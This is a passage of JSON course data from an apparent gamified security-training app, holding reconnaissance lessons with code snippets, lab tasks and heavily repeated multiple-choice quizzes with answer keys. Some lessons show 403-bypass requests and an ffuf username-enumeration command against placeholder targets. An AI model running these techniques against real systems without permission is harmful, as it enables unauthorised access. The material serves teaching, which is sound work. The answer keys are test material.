type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1}]},{"id":"r2-ip-lookup","cat":"Reconnaissance","title":"IP Geolocation and Reputation","diff":1,"xp":50,"intro":"Check IP reputation and geolocation.","sections":[{"type":"text","content":"IP lookup reveals: ISP, location, ASN, and blacklist status."},{"type":"code","lang":"bash","content":"curl -s ipapi.co/1.2.3.4/json | jq '.org,.city,.country'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"IP reputation checks reveal...","opts":["Passwords","ISP, location, and blacklist status","Vulnerabilities","Source code"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-tls-scan","cat":"Reconnaissance","title":"TLS Version Assessment","diff":2,"xp":150,"intro":"Check for weak TLS versions and ciphers.","sections":[{"type":"text","content":"testssl.sh comprehensively tests TLS configuration."},{"type":"code","lang":"bash","content":"testssl.sh target.com\nnmap --script ssl-enum-ciphers -p 443 target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Weak TLS versions include...","opts":["TLS 1.3","SSLv3 and TLS 1.0","Only TLS 1.2","None"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"r2-spf-check","cat":"Reconnaissance","title":"SPF Record Analysis","diff":1,"xp":75,"intro":"Check email authentication configuration.","sections":[{"type":"text","content":"SPF defines which servers can send email for a domain."},{"type":"code","lang":"bash","content":"dig txt target.com | grep spf\n# v=spf1 include:_spf.google.com ~all"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SPF defines...","opts":["Encryption","Which servers can send email for the domain","DNS servers","Web servers"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1}]},{"id":"r2-403-bypass","cat":"Reconnaissance","title":"403 Bypass Techniques","diff":3,"xp":200,"intro":"Bypass forbidden responses with path manipulation.","sections":[{"type":"text","content":"Try: path case, URL encoding, directory traversal, method change, headers."},{"type":"code","lang":"bash","content":"# Original: GET /admin -> 403\n/Admin /ADMIN /admin/ /admin/. /.;/admin\ncurl -H 'X-Original-URL: /admin' target.com/\ncurl -X POST target.com/admin"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"403 bypass uses...","opts":["SQL injection","Path manipulation, headers, and method changes","XSS","Brute force"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-ffuf-advanced","cat":"Reconnaissance","title":"Advanced ffuf Fuzzing","diff":2,"xp":150,"intro":"Content discovery with ffuf filters and matchers.","sections":[{"type":"text","content":"ffuf fuzzes URLs, headers, POST data with powerful filtering."},{"type":"code","lang":"bash","content":"ffuf -u https://target.com/FUZZ -w wordlist.txt -fc 404 -mc 200,301,302"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"ffuf's -fc flag...","opts":["Filters by content","Filters by status code (exclude)","Matches content","Matches size"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"r2-burp-passive","cat":"Reconnaissance","title":"Burp Suite Passive Scanning","diff":1,"xp":75,"intro":"Discover issues by passively analyzing traffic.","sections":[{"type":"text","content":"Burp's passive scanner finds issues without sending extra requests."},{"type":"code","lang":"bash","content":"# Browse the site through Burp proxy\n# Passive scanner identifies:\n# Mixed content, missing headers, cookies without flags\n# Information disclosure, outdated libraries"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Passive scanning...","opts":["Sends exploit requests","Analyzes traffic without extra requests","Requires admin","Modifies responses"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-enum-users","cat":"Reconnaissance","title":"Username Enumeration","diff":2,"xp":150,"intro":"Discover valid usernames through timing and error differences.","sections":[{"type":"text","content":"Login forms that say 'invalid username' vs 'invalid password' leak valid users."},{"type":"code","lang":"bash","content":"# Different errors reveal valid usernames:\n# 'User not found' vs 'Invalid password'\n# Timing: valid user takes longer (password check)\nffuf -u target.com/login -d 'user=FUZZ&pass=x' -w users.txt -fr 'not found'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Username enumeration exploits...","opts":["Encryption","Different error messages or timing for valid vs invalid users","SQL injection","File upload"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"r2-param-mining","cat":"Reconnaissance","title":"Parameter Mining","diff":3,"xp":200,"intro":"Discover hidden parameters in web applications.","sections":[{"type":"text","content":"Fuzz parameter names to find debug, admin, or hidden functionality."},{"type":"code","lang":"bash","content":"arjun -u https://target.com/page\nparamspider -d target.com\n# Or manual:\nffuf -u 'https://target.com/api?FUZZ=test' -w params.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Hidden parameters may enable...","opts":["Nothing","Debug mode, admin functions, or bypass controls","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive 